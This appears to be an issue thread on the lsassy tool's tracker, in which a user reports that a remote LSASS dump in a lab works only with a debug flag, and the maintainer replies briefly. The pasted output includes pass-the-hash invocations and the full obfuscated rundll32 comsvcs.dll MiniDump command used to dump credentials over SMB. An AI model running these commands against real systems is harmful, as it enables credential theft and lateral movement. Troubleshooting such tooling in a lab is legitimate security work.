Working with `debug` but not without it.

[n3rada]

I just got a strange behavior here. I have setup one pivot and I am running this command from my attacker machine:

lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7fe16afd9650>
[x] 172.16.207.187 Connection error
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 278, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3.py", line 1006, in login
    if packet.isValidAnswer(STATUS_SUCCESS):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/lsassy/session.py", line 53, in get_session
    self.smb_session.login(username, password, domain, lmhash, nthash)
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 280, in login
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] 172.16.207.187 Couldn't connect to remote host
[*] 172.16.207.187 Cleaning...
[*] 172.16.207.187 dumper: None
[*] 172.16.207.187 file: None
[*] 172.16.207.187 session: <lsassy.session.Session object at 0x7fe16a3f5310>
[*] 172.16.207.187 Potential issue while cleaning dumper: 'NoneType' object has no attribute 'clean'
[*] 172.16.207.187 Potential issue while closing file: 'NoneType' object has no attribute 'close'
[*] 172.16.207.187 Couldn't delete lsass dump using file. Trying dump object...
[*] 172.16.207.187 Potential issue while deleting lsass dump: 'NoneType' object has no attribute 'dump_path'
[*] 172.16.207.187 Potential issue while closing SMB session: 'NoneType' object has no attribute 'close'

But with -debug it works...

lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7f2d69e36f10>
[*] 172.16.207.187 SMB session opened
[*] 172.16.207.187 Connecting to C$
[*] 172.16.207.187 Authentication successful
[*] 172.16.207.187 Dumping via lsassy.dumpmethod.comsvcs
[*] 172.16.207.187 Exec method: <lsassy.exec.smb.Exec object at 0x7f2d69c83710>
[*] 172.16.207.187 Exec method: <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>
[*] 172.16.207.187 Exec method: <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>
[*] 172.16.207.187 Exec method: <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>
[*] 172.16.207.187 Exec Methods: {'smb': <lsassy.exec.smb.Exec object at 0x7f2d69c83710>, 'wmi': <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>, 'task': <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>, 'mmc': <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>}
[*] 172.16.207.187 Trying smb method
[*] 172.16.207.187 Building command - Exec Method has seDebugPrivilege: True | seDebugPrivilege needed: True | Powershell allowed: True | Copy executor: False
[*] 172.16.207.187 ['for /f "tokens=1,2 delims= " ^%A in (\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+0000^24 ^%B \\Windows\\Temp\\lZ2tWb35F.vsv full']
[*] 172.16.207.187 Transformed command: CMd.eXe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\lZ2tWb35F.vsv full
[*] 172.16.207.187 Executing using lsassy.exec.smb
[*] 172.16.207.187 StringBinding ncacn_np:172.16.207.187[\pipe\svcctl]
[*] 172.16.207.187 Service JIjOseGv created
[*] 172.16.207.187 Service JIjOseGv deleted
[*] 172.16.207.187 /Windows/Temp//lZ2tWb35F.vsv handle acquired
[*] 172.16.207.187 Lsass dumped in C:\Windows\Temp\lZ2tWb35F.vsv (47628591 Bytes)
[*] 172.16.207.187 File C$/Windows/Temp//lZ2tWb35F.vsv deleted
[*] 172.16.207.187 Lsass dump deleted

I've cut off the end so as not to reveal the hashes. I don't know if you'll be able to do anything about this one @Hackndo, but I'd love to get your take on it.

[Hackndo]

That's a weird behavior indeed... I shall try and find out what's causing this... Is it a steady behavior ?

[n3rada]

Regular on this machine from this lab. I don't usually have any problems. That's why I'm opening this issue, so that if one day you see the same behaviour, you can be sure that it might not be as isolated as you think.

But for the time being ... 🤷‍♂️